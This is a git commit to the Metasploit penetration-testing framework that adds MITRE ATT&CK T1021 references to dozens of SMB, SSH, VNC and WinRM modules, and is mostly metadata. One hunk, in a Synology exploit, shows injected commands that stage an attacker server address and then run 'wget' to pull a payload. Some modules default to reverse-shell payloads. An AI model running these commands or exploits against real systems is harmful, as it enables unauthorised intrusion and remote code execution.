Add references to MITRE ATT&CK T1021 - Remote Services
This commit is contained in:
Christophe De La Fuente
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'j0hn__f'
|
||||
],
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -29,7 +29,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options([
|
||||
|
||||
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'hdm'
|
||||
],
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -41,6 +41,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
[ 'URL', 'https://github.com/worawit/MS17-010' ],
|
||||
[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
|
||||
[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
|
||||
],
|
||||
'DisclosureDate' => '2017-03-14',
|
||||
'Notes' => {
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'References' => [
|
||||
['CVE', '2010-0926'],
|
||||
['OSVDB', '62145'],
|
||||
['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
|
||||
['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'hdm' # metasploit module
|
||||
],
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Notes' => {
|
||||
|
||||
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['URL', 'https://webexec.org'],
|
||||
['CVE', '2018-15442']
|
||||
['CVE', '2018-15442'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
||||
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
['OSVDB', '25479'],
|
||||
['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
|
||||
['CVE', '2006-2369'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC],
|
||||
],
|
||||
'DisclosureDate' => '2006-05-15',
|
||||
'Notes' => {
|
||||
|
||||
@@ -43,6 +43,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0506'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => {
|
||||
|
||||
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
['CVE', '2018-16158'],
|
||||
['EDB', '45283'],
|
||||
['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
|
||||
['URL', 'https://www.ctrlu.net/vuln/0006.html']
|
||||
['URL', 'https://www.ctrlu.net/vuln/0006.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2018-07-18',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
['EDB', '39224'],
|
||||
['PACKETSTORM', '135225'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],
|
||||
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
|
||||
['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2016-01-09',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'References' => [
|
||||
['CVE', '2015-7755'],
|
||||
['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],
|
||||
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
|
||||
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2015-12-20',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2018-10933'],
|
||||
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']
|
||||
['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2018-10-16',
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -22,7 +22,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Author' => ['Wyatt Dahlenburg (@wdahlenb)'],
|
||||
'Platform' => ['linux'],
|
||||
'SessionTypes' => ['shell', 'meterpreter'],
|
||||
'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']],
|
||||
'References' => [
|
||||
['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Notes' => {
|
||||
'Reliability' => UNKNOWN_RELIABILITY,
|
||||
'Stability' => UNKNOWN_STABILITY,
|
||||
|
||||
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
},
|
||||
'Author' => ['todb'],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors
|
||||
|
||||
@@ -35,7 +35,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
be shared between subject keys or only belong to a single one.
|
||||
},
|
||||
'Author' => ['todb', 'RageLtMan'],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options(
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
},
|
||||
'Author' => 'egypt',
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'References' => [
|
||||
[ 'CVE', '2012-1803' ],
|
||||
[ 'EDB', '18779' ],
|
||||
[ 'US-CERT-VU', '889195' ]
|
||||
[ 'US-CERT-VU', '889195' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Author' => [
|
||||
'Borja Merino <bmerinofe[at]gmail.com>',
|
||||
|
||||
@@ -14,7 +14,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',
|
||||
'References' => [
|
||||
['CVE', '2017-13872'],
|
||||
['URL', 'https://support.apple.com/en-us/HT208315']
|
||||
['URL', 'https://support.apple.com/en-us/HT208315'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC]
|
||||
],
|
||||
'Author' => 'jgor',
|
||||
'License' => MSF_LICENSE
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
'jduck'
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0506'] # Weak password
|
||||
[ 'CVE', '1999-0506'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
@@ -17,7 +17,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
This module runs arbitrary Windows commands using the WinRM Service
|
||||
},
|
||||
'Author' => [ 'thelightcosine' ],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options(
|
||||
|
||||
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [ 'thelightcosine', 'smashery' ],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
@@ -19,7 +19,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||
winrm option must be set.
|
||||
},
|
||||
'Author' => [ 'thelightcosine' ],
|
||||
'License' => MSF_LICENSE
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
]
|
||||
)
|
||||
|
||||
register_options(
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'hdm'
|
||||
],
|
||||
'References' => [
|
||||
['OSVDB', '61284']
|
||||
['OSVDB', '61284'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
|
||||
@@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['CVE', '2023-45249'],
|
||||
['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
|
||||
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
|
||||
['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix', 'linux'],
|
||||
|
||||
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'],
|
||||
['CVE', '2018-5999'],
|
||||
['CVE', '2018-6000']
|
||||
['CVE', '2018-6000'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Targets' => [
|
||||
[
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
|
||||
['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
|
||||
['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
|
||||
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
|
||||
['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2024-12-16',
|
||||
'Platform' => [ 'linux', 'unix' ],
|
||||
|
||||
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-2928'],
|
||||
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
|
||||
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
|
||||
@@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2019-15949'],
|
||||
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
|
||||
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Payload' => { 'BadChars' => "\x00" },
|
||||
'Targets' => [
|
||||
@@ -77,7 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Platform' => 'unix',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
|
||||
'Payload' => {
|
||||
# rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace
|
||||
'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
|
||||
# rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace
|
||||
'BadChars' => '"'
|
||||
}
|
||||
}
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
|
||||
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
|
||||
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
|
||||
['CVE', '2017-11610']
|
||||
['CVE', '2017-11610'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Targets' => [
|
||||
|
||||
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'CVE', '2017-15889' ],
|
||||
[ 'EDB', '43190' ],
|
||||
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
|
||||
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
|
||||
[ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
@@ -179,20 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
})
|
||||
|
||||
print_status('Cleaning env')
|
||||
inject_request(cookie, token, cmd = 'rm -rf /a')
|
||||
inject_request(cookie, token, cmd = 'rm -rf b')
|
||||
inject_request(cookie, token, 'rm -rf /a')
|
||||
inject_request(cookie, token, 'rm -rf b')
|
||||
command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
|
||||
command_space = 22 - "echo -n ''>>/a".length
|
||||
command_space -= 1
|
||||
command.each_slice(command_space) do |a|
|
||||
a = a.join('')
|
||||
vprint_status("Staging wget with: echo -n '#{a}'>>/a")
|
||||
inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
|
||||
inject_request(cookie, token, "echo -n '#{a}'>>/a")
|
||||
end
|
||||
print_status('Requesting payload pull')
|
||||
register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
|
||||
register_file_for_cleanup('/a')
|
||||
inject_request(cookie, token, cmd = 'wget -i /a -O b')
|
||||
inject_request(cookie, token, 'wget -i /a -O b')
|
||||
# at this point we let the HTTP server call the last stage
|
||||
# wfsdelay should be long enough to hold out for everything to download and run
|
||||
rescue ::Rex::ConnectionError
|
||||
|
||||
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
},
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
'References' => [
|
||||
[ 'CVE', '2013-2578']
|
||||
[ 'CVE', '2013-2578'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Targets' => [
|
||||
[ 'Automatic', {} ],
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['CVE', '2025-24016'],
|
||||
['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
|
||||
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
|
||||
['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix', 'linux'],
|
||||
|
||||
@@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
[ 'CVE', '2025-34082' ],
|
||||
[ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
|
||||
[ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
|
||||
[ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
|
||||
@@ -42,6 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['CVE', '2015-0936'],
|
||||
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
|
||||
],
|
||||
'DisclosureDate' => '2015-04-01', # Not a joke
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
[ 'CVE', '2016-1560' ], # password
|
||||
[ 'CVE', '2016-1561' ], # private key
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ]
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'DisclosureDate' => '2016-04-07',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
|
||||
[ 'CVE', '2012-1493' ],
|
||||
[ 'OSVDB', '82780' ],
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ]
|
||||
[ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'DisclosureDate' => '2012-06-11',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'CVE', '2020-4429' ], # insecure default password
|
||||
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
|
||||
[ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
|
||||
[ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
|
||||
[ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
|
||||
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['PACKETSTORM', '125754']
|
||||
['PACKETSTORM', '125754'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2014-03-17',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '2017-9462' ],
|
||||
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
|
||||
[ 'URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
|
||||
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['PACKETSTORM', '125755']
|
||||
['PACKETSTORM', '125755'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DisclosureDate' => '2014-03-17',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2017-7722'],
|
||||
['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']
|
||||
['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
|
||||
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2025-32433'],
|
||||
['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'],
|
||||
['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'],
|
||||
['URL', 'https://github.com/ProDefense/CVE-2025-32433']
|
||||
['URL', 'https://github.com/ProDefense/CVE-2025-32433'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Platform' => ['linux', 'unix'],
|
||||
'Arch' => [ARCH_CMD],
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2012-3579'],
|
||||
['OSVDB', '85028'],
|
||||
['BID', '55143'],
|
||||
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
|
||||
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
|
||||
@@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
[ 'CVE', '2016-7456' ],
|
||||
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
|
||||
],
|
||||
'DisclosureDate' => '2016-12-20',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
|
||||
['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
|
||||
['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
|
||||
],
|
||||
'DisclosureDate' => '2023-08-29',
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
||||
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'References' => [
|
||||
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
|
||||
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
|
||||
['URL', 'https://github.com/insanid/netgear-telenetenable']
|
||||
['URL', 'https://github.com/insanid/netgear-telenetenable'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2009-10-30', # Python PoC (TCP)
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2024-21683'],
|
||||
['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],
|
||||
['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],
|
||||
['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']
|
||||
['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2024-05-21',
|
||||
'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2024-1709'], # Auth bypass to create admin account.
|
||||
['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory
|
||||
['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC
|
||||
['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs
|
||||
['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'], # Analysis of both CVEs
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2024-02-19',
|
||||
'Platform' => %w[win linux unix],
|
||||
|
||||
@@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2011-0807'],
|
||||
['OSVDB', '71948']
|
||||
['OSVDB', '71948'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => ['win', 'linux', 'java'],
|
||||
'Targets' => [
|
||||
|
||||
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2017-11467'],
|
||||
